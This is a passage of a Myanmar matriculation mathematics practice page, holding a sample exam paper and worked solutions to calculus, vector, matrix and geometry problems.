(5 marks) Show/Hide Solution$ \displaystyle \begin{array}{l}\begin{array}{*{20}{l}} {\text{ Let the side-length of a square be }x} \\[2ex] {\text{ and the radius of the circle be }r} \\[2ex] {\text{ Sum of perimeters }=k(\text{ given })} \\[2ex] {4x+2\pi r=k} \\[2ex] {\therefore r=\displaystyle \frac{{k-4x}}{{2\pi }}} \\[2ex] {\text{ Let the sum of the areas be }A.} \\[2ex] {\therefore A={{x}^{2}}+\pi {{r}^{2}}} \end{array}\\[2ex]\begin{array}{*{20}{l}} {\therefore A={{x}^{2}}+\pi {{{\left( {\displaystyle \frac{{k-4x}}{{2\pi }}} \right)}}^{2}}} \\[2ex] {\therefore A={{x}^{2}}+\displaystyle \frac{{{{{(k-4x)}}^{2}}}}{{4\pi }}} \\[2ex] {\displaystyle \frac{{dA}}{{dx}}=2x+\displaystyle \frac{{2(-4)(k-4x)}}{{4\pi }}} \\[2ex] {\quad =2\left( {x+\displaystyle \frac{{4x-k}}{\pi }} \right)} \\[2ex] {\quad =\displaystyle \frac{2}{\pi }[(\pi +4)x-k]} \end{array}\\[2ex]\begin{array}{*{20}{l}} {\displaystyle \frac{{dA}}{{dx}}=0\text{ when }\displaystyle \frac{2}{\pi }[(\pi +4)x-k]=0} \\[2ex] {\therefore (\pi +4)x-k=0\Rightarrow x=\displaystyle \frac{k}{{\pi +4}}} \\[2ex] {\displaystyle \frac{{{{d}^{2}}A}}{{d{{x}^{2}}}}=\displaystyle \frac{{2(\pi +4)}}{\pi }>0} \\[2ex] {\therefore A\text{ is minimum when }x=\displaystyle \frac{k}{{\pi +4}}} \end{array}\\[2ex]\therefore r=\displaystyle \frac{1}{{2\pi }}\left[ {k-\displaystyle \frac{{4k}}{{\pi +4}}} \right]\\[2ex]\ \ \ \ \ =\displaystyle \frac{1}{{2\pi }}\left[ {\displaystyle \frac{{\pi k+4k-4k}}{{\pi +4}}} \right]\\[2ex]\ \ \ \ \ =\displaystyle \frac{1}{2}\left( {\displaystyle \frac{k}{{\pi +4}}} \right)\\[2ex]\ \ \ \ \ =\displaystyle \frac{x}{2}\\[2ex]\therefore x=2r\\[2ex]\text{Hence the sum of their areas is least,}\\[2ex]\text{when the side of the square is double }\\[2ex]\text{the}\ \text{radius of the circle}\text{.}\end{array}$14 (a). The vector$ \overrightarrow{{OA}}$has magnitude$39$units and has the same direction as$ \displaystyle 5\hat{i}+12\hat{j}$. The vector$ \overrightarrow{{OB}}$has magnitude$25$units and has the same direction as$ \displaystyle -3\hat{i}+4\hat{j}$. Express$ \overrightarrow{{OA}}$and$ \overrightarrow{{OB}}$in terms of$ \hat{i}$and$\hat{j}$and find the magnitude of$ \overrightarrow{{AB}}.$(5 marks) Show/Hide Solution$ \displaystyle \begin{array}{*{20}{l}} {\text{ Let }\vec{p}=5\hat{\imath }+12\hat{\jmath }\text{ and }\vec{q}=-3\hat{\imath }+4\hat{\jmath }} \\[2ex] \begin{array}{l}\therefore \ |\vec{p}|=\sqrt{{{{5}^{2}}+{{{12}}^{2}}}}=\sqrt{{169}}=13\text{ and }\\[2ex]\ \ |\vec{q}|=\sqrt{{{{{(-3)}}^{2}}+{{4}^{2}}}}=\sqrt{{25}}=5\end{array} \\[2ex] \begin{array}{l}\therefore \hat{p}=\displaystyle \frac{{\vec{p}}}{{|\vec{p}|}}=\displaystyle \frac{1}{{13}}(5\hat{\imath }+12\hat{\jmath })\text{ and }\\[2ex]\ \ \ \hat{q}=\displaystyle \frac{{\vec{q}}}{{|\vec{q}|}}=\displaystyle \frac{1}{5}(-3\hat{\imath }+4\hat{\jmath })\end{array} \\[2ex] {\ \ \ |\overrightarrow{{OA}}|=39\text{ and }\overrightarrow{{OA}}\text{ has the same direction }\hat{p}.} \\[2ex] \begin{array}{l}\therefore \overrightarrow{{OA}}=39\hat{p}\\[2ex]\ \ \ \ \ \ \ \ =39\times \displaystyle \frac{1}{{13}}(5\hat{\imath }+12\hat{\jmath })=15\hat{\imath }+36\hat{\jmath }\\[2ex]\ \ \ \ \ \ \ \ =15\hat{\imath }+36\hat{\jmath }\\[2ex]\begin{array}{*{20}{l}} \begin{array}{l}\text{ Similarly, }\\[2ex]\ \ |\overrightarrow{{OB}}|\ =25\text{ and }\overrightarrow{{OB}}\text{ has the same direction }\hat{q}\text{ }\text{. 
}\end{array} \\[2ex] \begin{array}{l}\therefore \overrightarrow{{OB}}=25\hat{q}\\[2ex]\ \ \ \ \ \ \ \ =25\times \displaystyle \frac{1}{5}(-3\hat{\imath }+4\hat{\jmath })=-15\hat{\imath }+20\hat{\jmath }\\[2ex]\ \ \ \ \ \ \ \ =-15\hat{\imath }+20\hat{\jmath }\end{array} \\[2ex] \begin{array}{l}\therefore \overrightarrow{{AB}}=\overrightarrow{{OB}}-\overrightarrow{{OA}}\\[2ex]\ \ \ \ \ \ \ \ =(-15\hat{\imath }+20\hat{\jmath })-(15\hat{\imath }+36\hat{\jmath })\\[2ex]\ \ \ \ \ \ \ \ =-30\hat{\imath }-16\hat{\jmath }\end{array} \\[2ex] \begin{array}{l}\therefore \ |\overrightarrow{{AB}}|\ =\sqrt{{{{{(-30)}}^{2}}+{{{(-16)}}^{2}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ =\sqrt{{1156}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ =34\end{array} \end{array}\end{array} \end{array}$14 (b). Find the coordinates of the stationary points of the curve$y = x\ln x - 2x$. Determine whether it is a maximum or a minimum point. (5 marks) Show/Hide Solution$ \displaystyle \begin{array}{*{20}{l}} {\text{Curve : }y=x\ln x-2x} \\[2ex] \begin{array}{l}\displaystyle \frac{{dy}}{{dx}}=x\left( {\displaystyle \frac{1}{x}} \right)+\ln x-2\\[2ex]\,\ \ \ \ =\ln x-1\end{array} \\[2ex] {\displaystyle \frac{{dy}}{{dx}}=0\text{ when }\ln x-1=0} \\[2ex] \begin{array}{l}\text{ln }x=1\\[2ex]x=e\left( {\ln x={{{\log }}_{e}}x} \right)\end{array} \\[2ex] \begin{array}{l}\text{When }x=e,\\[2ex]y=e\ln e-2e\\[2ex]\ \ \ =-e\end{array} \\[2ex] {\therefore \text{ The stationary point is }(e,-e)} \\[2ex] \begin{array}{l}\displaystyle \frac{{{{d}^{2}}y}}{{d{{x}^{2}}}}=\displaystyle \frac{1}{x}\\[2ex]{{\left. {\displaystyle \frac{{{{d}^{2}}y}}{{d{{x}^{2}}}}} \right|}_{{x=e}}}=\displaystyle \frac{1}{e}>0\end{array} \\[2ex] {\therefore (e,-e)\text{ is a minimum point}\text{. }} \end{array}$နားလည်လွယ်ကူစေရန် illustration ထည့်ပေးခြင်း ဖြစ်သည်။ ဖြေဆိုသည့်အခါ ပုံထည့်ဆွဲပေးရန်မလိုပါ။ 2020 MATRICULATION EXAMINATION Sample Question Set (3) MATHEMATICS Time allowed: 3hours WRITE YOUR ANSWERS IN THE ANSWER BOOKLET. SECTION (A) (Answer ALL questions.) 1 (a). Let$ \displaystyle f:R\backslash \{\pm 2\}\to R$be a function defined by$ \displaystyle f(x)=\frac{{3x}}{{{{x}^{2}}-4}}$.Find the positive value of$z$such that$f(z) = 1$. (3 marks) (b). If the polynomial$x^3 - 3x^2 + ax - b$is divided by$(x - 2 )$and$(x + 2)$, the remainders are$21$and$1$respectively. Find the values of$a$and$b$. (3 marks) 2(a). Find the middle term in the expansion of$(x^2 - 2y)^{10}$. (3 marks) (b). In a sequence if$u_1=1$and$u_{n+1}=u_n+3(n+1)$, find$u_5$. (3 marks) 3(a). If$ \displaystyle P=\left( {\begin{array}{*{20}{c}} x & {-4} \\ {8-y} & {-9} \end{array}} \right)$and$ \displaystyle {{P}^{{-1}}}=\left( {\begin{array}{*{20}{c}} {-3x} & 4 \\ {-7y} & 3 \end{array}} \right)$, find the values of$x$and$y$. (3 marks) (b). A bag contains tickets, numbered$11, 12, 13, ...., 30$. A ticket is taken out from the bag at random. Find the probability that the number on the drawn ticket is (i) a multiple of$7$(ii) greater than$15$and a multiple of$5$. (3 marks) 4(a). Draw a circle and a tangent$TAS$meeting it at$A$. Draw a chord$AB$making$ \displaystyle \angle TAB=\text{ }60{}^\circ $and another chord$BC \parallel TS$. Prove that$\triangle ABC$is equilateral. (3 marks) (b). If$ \displaystyle 3~\overrightarrow{{OA}}-2\overrightarrow{{OB}}-\overrightarrow{{OC}}~=\vec{0}$, show that the points$A, B$and$C$are collinear. (3 marks) 5(a). Solve the equation$2 \sin x \cos x -\cos x + 2\sin x - 1 = 0$for$ \displaystyle 0{}^\circ \le x\le \text{ }360{}^\circ $. (3 marks) (b). 
Differentiate$ \displaystyle y=\frac{1}{{\sqrt[3]{x}}}$from the first principles. (3 marks) SECTION (B) (Answer Any FOUR questions.) 6 (a). Given that Given$ \displaystyle A=\{x\in R|\ x\ne -\frac{1}{2},x\ne \frac{3}{2}\}$. If$f:A\to A$and$g:A\to A$are defined by$f(x)=\displaystyle \frac{3x-5}{2x+1}$and$g(x)=\displaystyle \frac{x+5}{3-2x}$, show that$f$and$g$are inverse of each other. (5 marks) (b). Given that$x^5 + ax^3 + bx^2 - 3 = (x^2 - 1) Q(x) - x - 2$, where$Q(x)$is a polynomial. State the degree of$Q (x)$and find the values of$a$and$b$. Find also the remainder when$Q (x)$is divided by$x + 2$. (5 marks) 7 (a). The binary operation$\odot$on$R$be defined by$x\odot y=x+y+10xy$Show that the binary operation is commutative. Find the values$b$such that$ (1\odot b)\odot b=485$. (5 marks) (b). If, in the expansion of$(1 + x)^m (1 – x)^n$, the coefficient of$x$and$x^2$are$-5$and$7$respectively, then find the value of$m$and$n$. (5 marks) 8 (a). Find the solution set in$R$for the inequation$2x (x + 2)\ge (x + 1) (x + 3)$and illustrate it on the number line. (5 marks) (b). If the$ {{m}^{{\text{th}}}}$term of an A.P. is$ \displaystyle \frac{1}{n}$and$ {{n}^{{\text{th}}}}$term is$ \displaystyle \frac{1}{m}$where$m\ne n$, then show that$u_{mn} = 1$. (5 marks) 9 (a). The sum of the first two terms of a geometric progression is$12$and the sum of the first four terms is$120$. Calculate the two possible values of the fourth term in the progression. (5 marks) (b). Given that$ A=\left( {\begin{array}{*{20}{c}} {\cos \theta } & {-\sin \theta } \\ {\sin \theta } & {\cos \theta } \end{array}} \right)$. If$A + A' = I$where$I$is a unit matrix of order$2$, find the value of$\theta$for$ \displaystyle 0{}^\circ <\theta <90{}^\circ $. (5 marks) 10 (a). The matrix$A$is given by$ \displaystyle A=\left( {\begin{array}{*{20}{c}} 2 & 3 \\ 4 & 5 \end{array}} \right)$. (i) Prove that$A^2 = 7A + 2I$where$I$is the unit matrix of order$2$. (ii) Hence, show that$ \displaystyle {{A}^{{-1}}}=\frac{1}{2}~\left( {A-7I} \right)$. (5 marks) (b). Draw a tree diagram to list all possible outcomes when four fair coins are tossed simultaneously. Hence determine the probability of getting: (i) all heads, (ii) two heads and two tails, (iii) more tails than heads, (iv) at least one tail, (v) exactly one head. (5 marks) SECTION (C) (Answer Any THREE questions.) 11 (a).$PQR$is a triangle inscribed in a circle. The tangent at$P$meet$RQ$produced at$T$,and$PC$bisecting$\angle RPQ$meets side$RQ$at$C$. Prove$\triangle TPC$is isosceles. (5 marks) (b). In$\triangle ABC$,$D$is a point of$AC$such that$AD = 2CD$.$E$is on$BC$such that$DE \parallel AB$. Compare the areas of$\triangle CDE$and$\triangle ABC$. If$\alpha (ABED) = 40$, what is$\alpha(ΔABC)$? (5 marks) 12 (a). If$L, M, N,$are the middle points of the sides of the$\triangle ABC$, and$P$is the foot of perpendicular from$A$to$BC$. Prove that$L, N, P, M$are concyclic. (5 marks) (b). Solve the equation$\displaystyle \sqrt{3}\cos \theta +\sin \theta =\sqrt{2}$for$ \displaystyle 0{}^\circ \le \theta \le 360{}^\circ $. (5 marks) 13 (a). In$\triangle ABC, AB = x, BC = x + 2$,$AC = x – 2$where$x > 4$, prove that$ \displaystyle \cos A=\frac{{x-8}}{{2(x-2)}}$. Find the integral values of$x$for which$A$is obtuse. (5 marks) (b). The sum of the perimeters of a circle and square is$k$, where$k$is some constant. Using calculus, prove that the sum of their areas is least, when the side of the square is double the radius of the circle. (5 marks) 14 (a). 
The vector$ \overrightarrow{{OA}}$has magnitude$39$units and has the same direction as$ \displaystyle 5\hat{i}+12\hat{j}$. The vector$ \overrightarrow{{OB}}$has magnitude$25$units and has the same direction as$ \displaystyle -3\hat{i}+4\hat{j}$. Express$ \overrightarrow{{OA}}$and$ \overrightarrow{{OB}}$in terms of$ \hat{i}$and$\hat{j}$and find the magnitude of$ \overrightarrow{{AB}}.$(5 marks) (b). Find the coordinates of the stationary points of the curve$y = x\ln x - 2x$. Determine whether it is a maximum or a minimum point. (5 marks) Target Mathematics ၏ အစဉ်အလာအတိုင်း တက္ကသိုလ်ဝင်တန်း စာမေးပွဲကို ဝင်ရောက်ဖြေဆိုကြမည့် ကျောင်းသား/သူတို့အတွက် လေ့ကျင့်ရန် မေးခွန်းတစ်စုံ တင်ပြလိုက်ပါသည်။ လေ့ကျင့်ဖြေဆိုကြစေလိုပါသည်။ အဖြေများကို နောက်ရက်တွင် ဆက်လက် ဖော်ပြပေးပါမည်။ 1. Find the unit vector in the direction of$ \displaystyle \overrightarrow{{PQ}}$where$ \displaystyle P$and$ \displaystyle Q$are points$ \displaystyle (2, 3)$and$ \displaystyle (7, – 9)$. Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ P\operatorname{and}\ Q\ \text{are points}\ (2,3)\ \operatorname{and}\ (7,-9).\\\\\therefore \ \ \overrightarrow{{OP}}=\left( {\begin{array}{*{20}{c}} 2 \\ 3 \end{array}} \right)\ \operatorname{and}\ \ \overrightarrow{{OQ}}=\left( {\begin{array}{*{20}{c}} 7 \\ {-9} \end{array}} \right)\\\\\ \ \ \ \overrightarrow{{PQ}}=\overrightarrow{{OQ}}-\ \overrightarrow{{OP}}\\\\\ \ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 7 \\ {-9} \end{array}} \right)-\left( {\begin{array}{*{20}{c}} 2 \\ 3 \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 5 \\ {-12} \end{array}} \right)\\\\\therefore \ \ \left| {\ \overrightarrow{{PQ}}} \right|=\sqrt{{{{5}^{2}}+{{{\left( {-12} \right)}}^{2}}}}=13\\\\\therefore \ \ \text{The unit vector in }\\\ \ \ \ \text{the direction of}\ \ \ \ =\displaystyle \frac{{\overrightarrow{{PQ}}}}{{\left| {\ \overrightarrow{{PQ}}} \right|}}\\\\\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{1}{{13}}\left( {\begin{array}{*{20}{c}} 5 \\ {-12} \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {\displaystyle \frac{5}{{13}}} \\ {-\displaystyle \frac{{12}}{{13}}} \end{array}} \right)\end{array}$2. Given that$ \displaystyle \overrightarrow{{OP}}=\widehat{\text{i}}+2\widehat{\text{j}}$and$ \displaystyle \overrightarrow{{OQ}}=7\widehat{\text{i}}-4\widehat{\text{j}}$. Find the position vector of a point$ \displaystyle R$which lies on the line$ \displaystyle PQ$such that$ \displaystyle PR : RQ = 2 : 1$. Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ \ \overrightarrow{{OP}}=\widehat{\text{i}}+2\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{OQ}}=7\widehat{\text{i}}-4\widehat{\text{j}}\\\\\ \ \ \ \ PR:RQ=2:1\\\\\ \ \ \ \ \text{By section formula},\ \\\\\ \ \ \ \ \ \overrightarrow{{OR}}=\displaystyle \frac{{\left( {1\times \overrightarrow{{OP}}} \right)+\left( {2\times \overrightarrow{{OQ}}} \right)}}{{1+2}}\ \\\\\ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{1}{3}\ \left[ {\widehat{\text{i}}+2\widehat{\text{j}}+2\left( {7\widehat{\text{i}}-4\widehat{\text{j}}} \right)} \right]\\\\\ \ \ \ \ \ \ \ \ \ \ \ =5\widehat{\text{i}}-2\widehat{\text{j}}\end{array}$3. If$ \displaystyle \overrightarrow{{OA}}=-5\widehat{\text{i}}+6\widehat{\text{j}}$,$ \displaystyle \overrightarrow{{OB}}=2\widehat{\text{i}}+5\widehat{\text{j}}$and$ \displaystyle \overrightarrow{{OC}}=9\widehat{\text{i}}+4\widehat{\text{j}}$, show that$ \displaystyle A, B$and$ \displaystyle C$are collinear. 
Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ \ \overrightarrow{{OA}}=-5\widehat{\text{i}}+6\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{OB}}=2\widehat{\text{i}}+5\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{OC}}=9\widehat{\text{i}}+4\widehat{\text{j}}\\\ \ \ \ \ \\\therefore \ \ \ \overrightarrow{{AB}}=\overrightarrow{{OB}}-\overrightarrow{{OA}}\\\\\ \ \ \ \ \ \ \ \ \ =\left( {2\widehat{\text{i}}+5\widehat{\text{j}}} \right)-\left( {-5\widehat{\text{i}}+6\widehat{\text{j}}} \right)\\\\\ \ \ \ \ \ \ \ \ \ =7\widehat{\text{i}}-\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{BC}}=\overrightarrow{{OC}}-\overrightarrow{{OB}}\\\\\ \ \ \ \ \ \ \ \ \ =\left( {9\widehat{\text{i}}+4\widehat{\text{j}}} \right)-\left( {2\widehat{\text{i}}+5\widehat{\text{j}}} \right)\\\\\ \ \ \ \ \ \ \ \ \ =7\widehat{\text{i}}-\widehat{\text{j}}\\\\\therefore \ \ \ \overrightarrow{{AB}}=\overrightarrow{{BC}}\\\\\therefore \ \ \ A,B\ \operatorname{and}\ C\ \text{are collinear}.\end{array}$4. Given that$ \displaystyle \overrightarrow{{OP}}=\left( {\begin{array}{*{20}{c}} k \\ 5 \end{array}} \right)$,$ \displaystyle \overrightarrow{{OQ}}=\left( {\begin{array}{*{20}{c}} {-2} \\ 8 \end{array}} \right)$and$ \displaystyle \overrightarrow{{OR}}=\left( {\begin{array}{*{20}{c}} 3 \\ {11} \end{array}} \right)$. If$ \displaystyle P, Q$and$ \displaystyle R$are collinear, find the value of$ \displaystyle k$. Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ \ \overrightarrow{{OP}}=\left( {\begin{array}{*{20}{c}} k \\ 5 \end{array}} \right),\\\\\ \ \ \ \overrightarrow{{OQ}}=\left( {\begin{array}{*{20}{c}} {-2} \\ 8 \end{array}} \right),\\\\\ \ \ \ \overrightarrow{{OR}}=\left( {\begin{array}{*{20}{c}} 3 \\ {11} \end{array}} \right),\\\\\therefore \ \ \overrightarrow{{PQ}}=\overrightarrow{{OQ}}-\overrightarrow{{OP}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-2} \\ 8 \end{array}} \right)-\left( {\begin{array}{*{20}{c}} k \\ 5 \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-2-k} \\ 3 \end{array}} \right)\\\\\ \ \ \ \overrightarrow{{QR}}=\overrightarrow{{OR}}-\overrightarrow{{OQ}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 3 \\ {11} \end{array}} \right)-\left( {\begin{array}{*{20}{c}} {-2} \\ 8 \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 5 \\ 3 \end{array}} \right)\\\\\ \ \ \ \text{By the problem,}\ \\\\\ \ \ P,\ Q\ \operatorname{and}\ R\ \text{are collinear}.\\\\\therefore \ \ \text{Let}\ \overrightarrow{{PQ}}=h\overrightarrow{{QR}}\\\\\therefore \ \ \left( {\begin{array}{*{20}{c}} {-2-k} \\ 3 \end{array}} \right)=h\left( {\begin{array}{*{20}{c}} 5 \\ 3 \end{array}} \right)\\\\\ \ \ \ \left( {\begin{array}{*{20}{c}} {-2-k} \\ 3 \end{array}} \right)=\left( {\begin{array}{*{20}{c}} {5h} \\ {3h} \end{array}} \right)\\\\\therefore \ \ 3h=3\\\\\ \ \ \ h=1\\\\\ \ \ \ -2-k=5h\\\\\ \ \ k=-2-5h\\\\\ \ \ k=-7\\\ \ \ \end{array}$5. Using a vector method, show that the points$ \displaystyle A (– 8, 10), B (– 1, 9)$and$ \displaystyle C (6, 8)$are collinear and hence find the ratio$ \displaystyle AB : BC$. 
Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ \ \overrightarrow{{OA}}=\left( {\begin{array}{*{20}{c}} {-8} \\ {10} \end{array}} \right),\\\\\ \ \ \ \overrightarrow{{OB}}=\left( {\begin{array}{*{20}{c}} {-1} \\ 9 \end{array}} \right),\\\\\ \ \ \ \overrightarrow{{OC}}=\left( {\begin{array}{*{20}{c}} 6 \\ 8 \end{array}} \right),\\\\\therefore \ \ \overrightarrow{{AB}}=\overrightarrow{{OB}}-\overrightarrow{{OA}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-1} \\ 9 \end{array}} \right)-\left( {\begin{array}{*{20}{c}} {-8} \\ {10} \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 7 \\ {-1} \end{array}} \right)\\\\\ \ \ \ \overrightarrow{{BC}}=\overrightarrow{{OC}}-\overrightarrow{{OB}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 6 \\ 8 \end{array}} \right)-\left( {\begin{array}{*{20}{c}} {-1} \\ 9 \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 7 \\ {-1} \end{array}} \right)\\\\\therefore \ \ \overrightarrow{{AB}}=\overrightarrow{{BC}}\\\\\ \ \ A,\ B\ \operatorname{and}\ C\ \text{are collinear and }\\\\\ \ \ AB:BC=1:1\ \end{array}$6. If$ \displaystyle \overrightarrow{{OP}}=\left( {\begin{array}{*{20}{c}} {-3} \\ 8 \end{array}} \right)$,$ \displaystyle \overrightarrow{{OQ}}=\left( {\begin{array}{*{20}{c}} {-5} \\ {14} \end{array}} \right)$and$ \displaystyle \overrightarrow{{OR}}=\left( {\begin{array}{*{20}{c}} 9 \\ {12} \end{array}} \right)$, show that$ \displaystyle \Delta PQR$is a right triangle. Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ \ \overrightarrow{{OP}}=\left( {\begin{array}{*{20}{c}} {-3} \\ 8 \end{array}} \right),\\\\\ \ \ \ \overrightarrow{{OQ}}=\left( {\begin{array}{*{20}{c}} {-5} \\ {14} \end{array}} \right),\\\\\ \ \ \ \overrightarrow{{OR}}=\left( {\begin{array}{*{20}{c}} 9 \\ {12} \end{array}} \right),\\\\\therefore \ \ \overrightarrow{{PQ}}=\overrightarrow{{OQ}}-\overrightarrow{{OP}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-5} \\ {14} \end{array}} \right)-\left( {\begin{array}{*{20}{c}} {-3} \\ 8 \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-2} \\ 6 \end{array}} \right)\\\\\therefore \ PQ=\sqrt{{{{{\left( {-2} \right)}}^{2}}+{{6}^{2}}}}=\sqrt{{40}}\\\\\ \ \ \ \overrightarrow{{QR}}=\overrightarrow{{OR}}-\overrightarrow{{OQ}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 9 \\ {12} \end{array}} \right)-\left( {\begin{array}{*{20}{c}} {-5} \\ {14} \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {14} \\ {-2} \end{array}} \right)\\\\\therefore \ QR=\sqrt{{{{{14}}^{2}}+{{{\left( {-2} \right)}}^{2}}}}=\sqrt{{200}}\\\\\ \overrightarrow{{PR}}=\overrightarrow{{OR}}-\overrightarrow{{OP}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 9 \\ {12} \end{array}} \right)-\left( {\begin{array}{*{20}{c}} {-3} \\ 8 \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {12} \\ 4 \end{array}} \right)\\\\\therefore \ \ PR=\sqrt{{{{{12}}^{2}}+{{4}^{2}}}}=\sqrt{{160}}\\\\\ \ \ \ P{{Q}^{2}}+P{{R}^{2}}=40+160=200\\\\\ \ \ \ Q{{R}^{2}}=200\\\\\therefore \ \ P{{Q}^{2}}+P{{R}^{2}}=\ Q{{R}^{2}}\\\\\therefore \ \ \Delta PQR\ \text{is a right triangle}\text{.}\end{array}$7. If the position vectors of the points$ \displaystyle A, B$and$ \displaystyle C$are$ \displaystyle 9\widehat{\text{i}}+6\widehat{\text{j}}$,$ \displaystyle 4\widehat{\text{i}}+3\widehat{\text{j}}$and$\displaystyle -5\widehat{\text{i}}+8\widehat{\text{j}}$respectively, show that the$ \displaystyle \Delta ABC$is an obtuse triangle. 
Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ \ \overrightarrow{{OA}}=9\widehat{\text{i}}+6\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{OB}}=4\widehat{\text{i}}+3\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{OC}}=-5\widehat{\text{i}}+8\widehat{\text{j}}\\\\\therefore \ \ \ \overrightarrow{{AB}}=\overrightarrow{{OB}}-\overrightarrow{{OA}}\\\\\ \ \ \ \ \ \ \ \ \ =-5\widehat{\text{i}}-3\widehat{\text{j}}\\\\\therefore \ \ \ A{{B}^{2}}={{\left( {-5} \right)}^{2}}+{{\left( {-3} \right)}^{2}}=34\\\\\therefore \ \ \ \overrightarrow{{BC}}=\overrightarrow{{OC}}-\overrightarrow{{OB}}\\\\\ \ \ \ \ \ \ \ \ \ =-9\widehat{\text{i}}+5\widehat{\text{j}}\\\\\therefore \ \ \ B{{C}^{2}}={{\left( {-9} \right)}^{2}}+{{5}^{2}}=106\\\\\therefore \ \ \ \overrightarrow{{AC}}=\overrightarrow{{OC}}-\overrightarrow{{OA}}\\\\\ \ \ \ \ \ \ \ \ \ =-14\widehat{\text{i}}+2\widehat{\text{j}}\\\\\therefore \ \ \ A{{C}^{2}}={{\left( {-14} \right)}^{2}}+{{2}^{2}}=200\\\\\therefore \ \ \ A{{B}^{2}}+B{{C}^{2}}=140\\\\\therefore \ \ \ A{{C}^{2}}>A{{B}^{2}}+B{{C}^{2}}\\\\\therefore \ \ \ \Delta ABC\ \text{is an obtuse triangle}\text{.}\end{array}$8. The position vectors of the points A, B, and C are$ \displaystyle \left( {\begin{array}{*{20}{c}} 5 \\ 2 \end{array}} \right)$,$ \displaystyle \left( {\begin{array}{*{20}{c}} 3 \\ {-4} \end{array}} \right)$and$ \displaystyle \left( {\begin{array}{*{20}{c}} {-1} \\ 4 \end{array}} \right)$respectively. Prove that$ \displaystyle \Delta ABC$is an isosceles right triangle. Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \overrightarrow{{OA}}=\left( {\begin{array}{*{20}{c}} 5 \\ 2 \end{array}} \right),\\\\\ \ \ \overrightarrow{{OB}}=\left( {\begin{array}{*{20}{c}} 3 \\ {-4} \end{array}} \right),\\\\\ \ \ \overrightarrow{{OC}}=\left( {\begin{array}{*{20}{c}} {-1} \\ 4 \end{array}} \right)\\\\\ \ \ \overrightarrow{{AB}}=\overrightarrow{{OB}}-\overrightarrow{{OA}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} 3 \\ {-4} \end{array}} \right)-\left( {\begin{array}{*{20}{c}} 5 \\ 2 \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-2} \\ {-6} \end{array}} \right)\\\\\therefore \ \ AB=\sqrt{{{{{\left( {-2} \right)}}^{2}}+{{{\left( {-6} \right)}}^{2}}}}=\sqrt{{40}}\\\\\ \ \ \overrightarrow{{BC}}=\overrightarrow{{OC}}-\overrightarrow{{OB}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-1} \\ 4 \end{array}} \right)-\left( {\begin{array}{*{20}{c}} 3 \\ {-4} \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-4} \\ 8 \end{array}} \right)\\\\\therefore \ \ BC=\sqrt{{{{{\left( {-4} \right)}}^{2}}+{{8}^{2}}}}=\sqrt{{80}}\\\\\ \ \ \overrightarrow{{AC}}=\overrightarrow{{OC}}-\overrightarrow{{OA}}\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-1} \\ 4 \end{array}} \right)-\left( {\begin{array}{*{20}{c}} 5 \\ 2 \end{array}} \right)\\\\\ \ \ \ \ \ \ \ \ =\left( {\begin{array}{*{20}{c}} {-6} \\ 2 \end{array}} \right)\\\\\therefore \ \ AC=\sqrt{{{{{\left( {-6} \right)}}^{2}}+{{2}^{2}}}}=\sqrt{{40}}\\\\\therefore \ \ AB=AC\\\\\ \ \ \ A{{B}^{2}}+A{{C}^{2}}=40+40=80=B{{C}^{2}}\\\\\therefore \ \ \ \Delta ABC\ \text{is an isosceles right triangle}\text{.}\end{array}$9.$ \displaystyle OABC$is a parallelogram such that$ \displaystyle \overrightarrow{{OA}}=5\widehat{\text{i}}+3\widehat{\text{j}}$and$ \displaystyle 